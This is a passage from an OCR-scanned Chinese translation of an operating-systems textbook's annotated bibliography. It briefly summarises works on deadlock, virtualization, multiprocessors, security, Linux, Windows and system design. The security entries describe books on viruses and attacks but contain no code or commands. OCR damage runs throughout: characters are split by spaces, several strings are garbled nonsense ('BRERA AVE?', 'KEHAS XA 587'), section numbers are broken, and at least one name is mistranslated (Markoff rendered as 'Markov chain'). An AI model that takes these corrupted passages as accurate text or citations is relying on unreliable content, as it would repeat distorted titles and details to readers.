度 日 益 重 要 以 至 于 操作 系统 需要 能 够 感知 CPU 温度 并 适应 它 。 这 篇 文章 就 是 针对 这 些 问 题 的 一 个 综述 ， 
同时 介绍 对 能 源 感 知 计算 中 的 计算 机 这 一 特定 问题 的 5 篇 文章 。 

Swanson and Caulfield, Refactor, Reduce, Recycle : Restructuring the I/O SStack for the Future of 
Storage 

硬盘 存在 有 两 个 原因 : 断 电 时 RAM 会 丢失 内 容 ; 同时 ， 硬 盘 的 容量 非常 大 。 但 是 假设 断 电 时 RAM 
BRERA AVE? 这 将 对 IO 硬盘 带 来 怎样 的 改变 ? 这 篇 文章 介绍 了 非 易 失 性 存储 以 及 它 对 系统 的 改变 。 
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Ion, From Touch Displays to the Surface; A Brief History of Touchscreen Technology 

触摸 屏 在 很 短 的 时 间 内 便 已 普及 。 这 篇 文章 以 简明 易 懂 的 解释 和 陈 年 佳酿 般 的 图 片 与 视频 ， 沿 着 触 
摸 屏 的 历史 进行 了 探索 。 真 是 令 人 着 迷 ! 

Walker and Cragon, Interrupt Processing in Concurrent Processors 

在 超标 量 计算 机 中 精确 实现 中 断 是 一 项 具有 挑战 性 的 工作 。 其 技巧 在 于 将 状态 序列 化 并 且 快 速 地 完 
成 这 项 工作 。 文 中 讨论 了 许多 设计 问题 以 及 相关 的 权衡 考虑 。 
13.1.6 FEM 

Coffman et al., System Deadlocks 

该 文 简要 介绍 了 死 锁 、 死 锁 的 产生 原因 以 及 如 何 预防 和 检测 。 

Holt, Some Deadlock Properties of Computer Systems 

该 文 围绕 死 锁 进行 了 讨论 。Holt 引入 了 一 个 可 用 来 分 析 某 些 死 锁 情 况 的 有 向 图 模型 。 

Isloor and Marsland, The Deadlock Problem; An Overview 

这 是 关于 死 锁 的 入门 教程 ， 重 点 放 在 了 数据 库 系统 ， 也 介绍 了 多 种 模型 和 算法 。 

Levine, Defining Deadlock 

这 本 书 的 第 6 章 聚 焦 于 资源 死 锁 ， 几 乎 没有 涉及 其 他 类 型 。 这 篇 简短 的 论文 中 指明 现 有 文献 中 出 现 
了 关于 死 锁 的 多 种 定义 ， 并 区 分 了 它们 之 间 微 妙 的 不 同 。 作 者 接着 着 眼 于 通信 、 调 度 以 及 交叉 死 锁 ， 并 
且 想 出 了 一 个 新 的 模型 试图 涵盖 所 有 类 型 的 死 锁 。 

Shub, A Unified Treatment of Deadlock 

这 是 一 部 关于 死 锁 产生 和 解决 的 简短 综述 ， 同 时 也 给 出 了 一 些 在 教学 时 应 当 强 调 内 容 的 建议 。 


13.1.7 虚拟 化 和 云 

Portnoy, Virtualization Essentials 

有 关 虚 拟 化 的 总 体 介绍 ， 涉 及 环境 (包括 虚拟 化 和 云 之 间 的 关系 ) 以 及 许多 方案 (更 多 地 强调 了 
VMware). 

Erl et al., Cloud Computing: Concepts, Technology & Architecture 

一 本 从 广泛 的 视角 专注 于 云 计算 的 书 。 作 者 详细 介绍 了 IAAS, PAAS, SAAS 等 缩 略 词 的 意思 ， 还 
有 “X”As A Service 的 成 员 。 

Rosenblum and Garfinkel, Virtual Machine Monitors: Current Technology and Future Trends 

这 篇 文章 以 虚拟 机 管理 的 历史 作为 开始 ， 接 着 讨论 了 当前 的 CPU 状态 、 内 存 以 及 IO 虚拟 机 。 此 
外 ,文中 还 涉及 以 上 三 个 方面 面临 的 各 种 难题 以 及 未 来 硬件 如 何 缓 解 这 些 难 题 。 

Whitaker et al., Rethinking the Design of Virtual Machine Monitors 

多 数 计算 机 都 有 一 些 奇怪 的 、 难 以 虚拟 化 的 方面 。 在 这 篇 论文 中 ，Denali 系统 的 创造 者 讨论 了 半 虚 
拟 化 ， 即 通过 改变 客户 操作 系统 来 避免 使 用 那些 怪异 的 特征 ， 从 而 使 它们 无 需 被 模拟 。 
13.1.8 多 处 理 机 系统 

Ahmad, Gigantic Clusters; Where Are They and What Are They Doing? 

为 了 了 解 大 型 多 计算 机 系统 的 先进 性 ， 可 以 读 这 篇 文章 。 它 描述 了 这 一 思想 ， 并 且 给 出 了 对 当前 在 使 
用 的 一 些 大 型 系统 的 概况 介绍 。 根 据 摩尔 定律 可 以 合理 推断 ， 这 里 提 到 的 规模 大 约 每 两 年 就 会 增长 一 倍 。 

Dubois et al., Synchronization, Coherence, and Event Ordering in Multiprocessors 

该 文 是 一 个 关于 基于 共享 存储 器 多 处 理 器 系统 中 同步 问题 的 指南 ， 而 且 ， 其 中 的 一 些 思想 对 于 单 处 
理 器 和 分 布 式 存储 系统 也 是 适用 的 。 

Geer, For Programmers, Multicore Chips Mean Multiple Challenges 

多 核 芯 片 的 时 代 正 在 到 来 一 一 不 论 软 件 界 的 人 们 是 否 准备 好 。 实 际 上 他 们 并 没有 准备 好 ， 而 且 为 
这 些 芯 片 编写 程序 往往 是 巨大 的 挑战 ， 这 包括 选择 合适 的 工具 、 将 有 关 工 作 划 分 成 小 的 部 分 ， 以 及 测 
试 结果 等 。 

Kant and Mohapatra, Internet Data Centers 


Internet 数据 中 心 是 一 个 被 兴奋 剂 刺 激 起 来 的 巨大 多 计算 机 。 常 常 让 成 千 上 万 台 计 算 机 为 一 个 应 用 





KEHAS XA 587 


软件 而 工作 。 这 里 的 主要 问题 就 是 可 伸缩 性 、 可 维护 性 和 能 源 。 这 篇 文章 既是 对 有 关 问 题 的 一 个 介绍 ， 
也 是 对 同一 个 问题 的 其 他 4 篇 文章 的 介绍 。 

Kumar et al., Heterogeneous Chip Multiprocessors 

用 在 台式 电脑 上 的 多 核 芯片 是 对 称 的 一 一 每 一 个 核 是 相同 的 。 然 而 对 一 些 应 用 软件 来 说 ， 异 构 的 多 
处 理 器 ( Chip multiprocessors, CMPS) 是 很 普遍 的 ， 有 的 核 用 来 计算 、 有 的 处 理 视 频 编 码 、 有 的 处 理 音 
频 编码 等 。 这 篇 文章 就 讨论 异 构 多 处 理 器 的 有 关 问 题 。 

Kwok and Ahmad, Static Scheduling Algorithms for Allocating Directed Task Graphs to 
Multiprocessors 

如 果 提 前 知道 所 有 作业 的 特性 ， 就 可 能 对 多 计算 机 系统 或 者 多 处 理 器 进行 优化 作业 调度 。 问 题 在 于 
最 优 调度 的 计算 时 间 会 很 长 。 在 这 篇 论文 中 ， 作 者 讨论 并 且 比 较 了 用 不 同方 法 解决 这 个 问题 的 27 种 著 
名 的 算法 。 

Zhuravlev et al., Survey of Scheduling Techniques for Addressing Shared Resources in Multicore 
Processors 

如 前 所 述 ， 多 处 理 器 系统 中 最 重要 的 挑战 之 一 是 共享 资源 的 竞争 。 这 项 调查 提出 了 不 同 的 调度 技术 
来 处 理 这 种 竞争 。 


13.19 安全 

Anderson, Security Engineering, 2nd Edition 

一 本 非常 棒 的 书 ， 非 常 清楚 地 解释 了 怎样 通过 该 领域 中 众所周知 的 研究 来 创建 一 个 可 靠 且 安 全 的 系 
统 。 这 本 书 不 仅 在 安全 的 多 个 方面 都 有 独到 见解 (包括 技术 、 应 用 和 组 织 问题 )， 而 且 还 是 线 上 免费 的 。 
没有 理由 不 读 它 。 

Van der Veen et al., Memory Errors: the Past, the Present, and the Future 

关于 内 存 错误 (EHR. SSE BO. RST ET RR) 的 历史 回顾 ， 其 中 包括 
攻击 与 防御 、 逃 避 防 御 的 攻击 、 阻 止 逃避 早期 防御 的 攻击 的 新 防御 等 ， 你 都 会 有 所 了 解 。 作 者 展示 了 尽 
管内 存 攻 击 手 段 已 经 很 陈旧 ， 而 且 其 他 攻击 手段 都 在 不 断 增强 ， 但 是 内 存 错 误 仍 然 是 非常 重要 的 攻击 途 
径 。 更 重要 的 是 ， 他 们 认为 这 种 情况 在 短期 之 内 不 会 有 任何 改变 。 

Bratus, What Hackers Learn That the Rest of Us Don't 

是 什么 让 黑客 如 此 与 众 不 同 ? 他 们 关注 而 一 般 程序 员 却 忽略 的 是 什么 ? 他 们 对 API 态度 不 同 吗 ? 4H 
枝 末 节 的 问题 重要 吗 ?” 读者 好 奇 吗 ? 去 读 一 读 这 篇 文章 吧 。 

Bratus et al., From Buffer Overflows to Weird Machines and Theory of Computation 

将 低级 的 缓冲 区 溢出 问题 与 伟大 的 阿兰 ' 图 灵 联 系 起 来 。 作 者 展示 了 黑客 用 样式 奇怪 的 指令 集 
对 weird machine 这 种 有 弱点 的 程序 进行 编程 。 通 过 这 样 做 ， 他 们 兜 了 一 大 圈 回 到 了 图 灵 的 开创 性 工作 
上 一 一 “什么 是 可 计算 的 ?” 

Denning, Information Warfare and Security 

信息 已 经 变 成 了 战争 武器 ， 既 是 军事 武器 也 是 军事 配合 武器 。 参 与 者 不 仅 尝试 攻击 对 方 的 信息 系 
统 ， 而 且 要 防卫 好 自己 的 系统 。 在 这 本 吸引 人 的 书 中 ， 作 者 讨论 了 所 有 能 想到 的 关于 攻击 策略 和 防卫 策 
略 的 话题 ， 从 数据 欺骗 到 包 窥探 器 。 该 书 对 于 计算 机 安全 有 极 大 兴趣 的 读者 来 说 是 必 读 的 。 

Ford and Allen, How Not to Be Seen 

病毒 ， 间 谍 软 件 ，rootkits 和 数字 版 权 管 理 系 统 都 对 隐藏 数据 情 有 独 钟 。 这 篇 文章 对 各 种 隐身 的 方 
法 进行 了 简要 的 介绍 。 

Hafner and Markoff, Cyberpunk 

书 中 介绍 了 世界 上 关于 年 轻 黑客 破坏 计算 机 的 三 种 流传 最 广 的 故事 ， 由 《纽约 时 报 》 曾 经 写 过 网 络 
蠕虫 故事 (马尔 可 夫 链 ) 的 计算 机 记者 讲述 。 

Johnson and Jajodia, Exploring Steganography: Seeing the Unseen 

隐身 术 具 有 悠久 的 历史 ， 可 以 回 到 利用 信使 的 头发 隐藏 信息 的 时 代 ， 那 时 先 将 信使 的 头发 剃 光 ， 然 
后 在 剃 光 的 头 上 文 上 信息 ， 之 后 在 信使 的 头发 长 出 来 之 后 再 将 他 送 走 。 尽 管 当 前 的 技术 很 多 ， 但 是 它们 
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也 是 数字 化 的 。 本 书 对 于 想 在 这 一 主题 彻底 人 门 的 读者 来 说 是 一 个 开端 。 

Ludwig, The Litte Black Book of Email Viruses 

如 果 想 编写 反 病 毒 软 件 并 且 想 了 解 在 位 级 别 (bit level) 上 这 些 病毒 是 怎么 工作 的 ， 那 么 这 本 书 很 适 
合 。 每 种 病毒 都 有 详细 的 讨论 并 且 也 提供 了 绝 大 多 数 的 实际 代码 。 但 是 ， 要 求 读者 透彻 掌握 Pentium 汇 
编 语言 编程 知识 。 

Mead, Who is Liable for Insecure Systems? 

很 多 有 关 计 算 机 安全 的 措施 都 是 从 技术 角度 出 发 的 ， 但 是 这 不 是 唯一 的 角度 。 也 许 软件 经 销 商 应 
该 对 由 于 他 们 的 问题 软件 而 带 来 的 损失 负 起 责任 。 如 果 比 现在 更 多 地 关注 于 安全 ， 这 会 是 经 销 商 的 机 会 
吗 ? 对 这 个 提 法 感 兴趣 吗 ? 可 以 读 一 下 这 篇 文章 。 

Milojicic, Security and Privacy 

安全 性 涉及 很 多 方面 ， 包 括 操作 系统 、 网 络 、 私 密 性 表示 等 。 在 这 篇 文章 中 ，6 位 安全 方面 的 专家 
给 出 了 他 们 各 自 关 于 这 个 主题 的 想法 和 见解 。 

Nachenberg, Computer Virus-Antivirus Coevolution 

当 反 病毒 的 开发 人 员 找 到 一 种 方法 能 够 探测 某 种 电脑 病毒 并 且 使 其 失效 时 ， 病 毒 的 编写 者 已 经 在 改 
进 和 开发 更 强 的 病毒 。 本 书 探讨 了 这 种 制造 病毒 和 反 病 毒 之 间 的 “ 猫 和 老鼠 ”游戏 。 作 者 对 于 反 病毒 编 
写 者 能 否 取 胜 这 场 游戏 并 不 持 乐观 态度 ， 这 对 电脑 用 户 来 说 也 许 不 是 一 个 好 消息 。 

Sasse, Red-Eye Blink, Bendy Shuffle, and the Yuck Factor: A User Experience of Biometric Airport Systems 

作者 讲述 了 他 在 许多 大 机 场所 经 历 的 瞳孔 识别 系统 的 体验 。 不 是 所 有 的 体验 都 是 正面 的 。 

Thibadeau, Trusted Computing for Disk Drives and Other Peripherals 

如 果 读 者 认为 磁盘 驱动 器 只 是 一 个 储存 比特 的 地 方 ， 那 么 最 好 再 考虑 一 下 。 现 代 的 磁盘 驱动 器 有 非常 
强大 的 CPU， 焰 级 的 RAM， 多 个 通信 通道 甚至 有 自己 的 启动 ROM。 简 而 言 之 ， 它 就 是 一 个 完整 的 计算 机 
系统 ， 很 容易 被 攻击 ， 因 此 它 也 需要 有 自己 的 保护 机 制 。 这 篇 文章 讨论 的 就 是 磁盘 驱动 器 的 安全 问题 。 


13.1.10 ”实例 研究 1: UNIX, Linux 和 Android 

Bovet and Cesati, Understanding the Linux Kernel 

该 书 也 许 是 对 Linux 内 核 整体 知识 讨论 最 好 的 一 本 书 。 它 涵盖 了 进程 、 存 储 管理 、 文 件 系统 和 信和 号 
等 内 容 。 

IEEE, Information Technology——Portable Operating System Interface ( POSIX), Part 1 : System 
Application Program Interface (API) [C Language] 

这 是 一 个 标准 。 一 些 部 分 确实 值得 一 读 ， 特 别 是 附录 B， 清 晰 阐述 了 为 什么 要 这 样 做 。 参 考 标准 的 
一 个 好 处 在 于 通过 定义 不 会 出 现 错误 。 例 如 ， 如 果 一 个 宏 的 名 字 中 的 排 字 错误 贯穿 了 整个 编辑 过 程 ， 那 
么 它 将 不 再 是 一 个 错误 ， 而 成 为 一 种 正式 标准 。 

Fusco, The Linux Programmers’ Toolbox 

这 本 书 是 为 那些 知道 一 些 基本 Linux 知识 ， 并 且 和 希望 能 够 进一步 了 解 Linux 程序 如 何 工作 的 中 级 读 
者 们 写作 的 。 该 书 假 定 读者 是 一 个 C 程序 员 。 

Maxwell, Linux Core Kernel Commentary 

该 书 的 前 400 页 给 出 了 Linux 的 内 核 源 代 码 的 一 个 子 集 。 后 面 的 150 页 则 是 对 这 些 代码 的 评述 。 与 
John Lions 的 经 典 书籍 (1996) 风格 很 相似 。 如 果 你 想 了 解 Linux 内 核 的 很 多 细节 ， 那 么 这 是 一 个 不 错 
的 起 点 , 但 是 读 40 000 17 C 语言 代码 不 是 每 个 人 都 必需 的 。 

13.1.11 ”实例 研究 2: Windows 8 

Cusumano and Selby, How Microsoft Builds Software 

你 是 否 曾 经 好 奇 过 一 个 人 如 何 能 够 写 出 29 000 000 行 代码 (就 像 Windows 2000 一 样 )， 并 且 让 它 作 
为 一 个 整体 运转 起 来 ?希望 探究 微软 是 如 何 采用 建造 和 测试 循环 来 管理 大 型 软件 项 目的 读者 ， 可 以 参看 
这 篇 论文 。 其 过 程 相 当 有 启发 性 。 

Rector and Newcomer, Win32 Programming 


如 果 想 找 一 本 1500 页 的 书 ， 告 诉 你 如 何 编 写 Windows HF, 那么 读 这 本 书 是 一 个 不 错 的 开始 。 它 
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涵盖 了 窗口 、 设 备 、 图 形 输 出 、 键 盘 和 鼠标 输入 、 打 印 、 存 储 管理 、 库 和 同步 等 许多 主题 。 阅 读 这 本 书 
要 求 读 者 具有 C 或 者 C++ 语言 的 知识 。 

Russinovich and Solomon, Windows Internals, Part 7 

如 果 想 学 习 如 何 使 用 Windows， 可 能 会 有 几 百 种 相关 的 书 。 如 果 想 知道 Windows 内 部 如 何 工 作 的， 本 
书 是 读者 最 好 的 选择 。 它 给 出 了 很 多 内 部 算法 和 数据 结构 以 及 可 观 的 技术 细节 。 没 有 任何 一 本 书 可 以 替代 。 


13.1.12 ”操作 系统 设计 

Saltzer and Kaashoek, Principles of Computer System Design: An Introduction 

这 本 书 从 整体 上 看 是 在 讲 计算 机 系统 ， 而 不 是 关注 操作 系统 的 各 个 部 分 ,但 是 他 们 定义 的 许多 原理 
在 操作 系统 中 都 有 着 广泛 的 应 用 。 书 中 非常 谨慎 地 定义 了 一 些 “ 基 本 理念 "， 比 如 名 称 、 文 件 系统 、 读 写 
一 致 、 已 验证 的 和 机 密 的 消息 等 ， 阅 读 这 些 内 容 是 非常 有 趣 的 。 在 我 们 看 来 ,原则 上 全 世界 的 计算 机 科 
学 家 每 天 都 该 在 工作 前 诵读 这 些 内 容 。 

Brooks, The Mythical Man Month: Essays On Software Engineering 

Fred Brooks 是 IBM 的 OS/360 的 主要 设计 者 之 一 。 以 其 丰富 的 经 验 ， 他 知道 在 计算 机 的 设计 中 什么 
是 可 以 运行 的 和 什么 是 不 能 运行 的 。 在 这 本 该 谐 且 内 涵 丰 富 的 书 中 ,他 25 年 前 给 出 的 建议 现在 一 样 是 
可 行 的 。 

Cooke et al., UNIX and Beyond; An Interview with Ken Thompson 

设计 一 个 操作 系统 与 其 说 是 一 门 科学 ， 不 如 说 是 一 门 艺术 。 因 此 ， 倾 听 该 领域 专家 的 谈话 是 一 个 
学 习 这 方面 知识 的 有 效 途径 。 在 操作 系统 领域 中 ， 没 有 谁 比 Ken Thompson 更 有 发 言 权 的 了 。 在 对 这 位 
UNIX, Inferno, Plan) 操作 系统 的 合作 设计 者 的 访问 过 程 中 ，Ken Thompson 阐明 了 在 这 个 领域 中 我 们 
从 哪里 开始 和 即将 走向 哪里 等 问题 。 

Corbaté, On Building Systems That Will Fail 

在 获得 图 灵 奖 的 演讲 大 会 上 ， 这 位 分 时 系统 之 父 阑 述 了 许多 Brooks 在 《人 月 神话 》 中 同样 关注 的 
问题 。 他 的 结论 是 所 有 的 复杂 系统 都 将 最 终 失 败 ， 为 了 设计 一 个 成 功 的 系统 ， 避 免 复杂 化 、 追 求 设计 上 
的 优雅 风格 和 简单 化 原则 是 绝对 重要 的 。 

Crowley, Operating Systems: A Design-Oriented Approach 

大 多 数 介 绍 操 作 系 统 的 教材 仅仅 是 讲 操作 系统 的 基本 概念 (进程 调度 、 虚 拟 内 存 等 ) 和 列举 一 些 例 
子 ， 对 于 如 何 设 计 一 个 操作 系统 却 没有 提 及 。 该 书 独一无二 的 特点 在 于 有 4 章 是 说 明 如 何 设计 一 个 操作 
系统 的 。 

Lampson, Hints for Computer System Design 

Butler Lampson 一 一 世界 上 最 主要 的 具有 创新 性 的 操作 系统 设计 者 之 一 ， 在 他 多 年 的 设计 经 历 中 总 
结 了 许多 设计 方法 、 对 设计 的 建议 和 一 些 指导 原则 并 写 下 这 篇 该 谐 的 内 涵 丰 富 的 文章 ， 正 如 Brooks 的 书 
一 样 ， 对 于 有 抱负 的 操作 系统 的 设计 者 来 说 ， 这 本 书 一 定 不 要 错过 。 

Wirth, A Plea for Lean Software 

Niklaus Wirth 是 一 名 经 验 丰 富 的 著名 系统 设计 师 ， 他 基于 一 些 简单 概念 制作 了 一 款 至 精 至 简 的 软 
件 ， 完 全 不 同 于 某 些 腔 肿 而 混乱 的 商业 软件 。 他 以 自己 的 Oberon 系统 来 阐明 观 点 ， 这 是 一 款 面向 网 络 、 
基于 图 形 用 户 的 操作 系统 ， 只 有 200KB， 包 括 Oberon 编译 器 和 文本 编辑 器 。 
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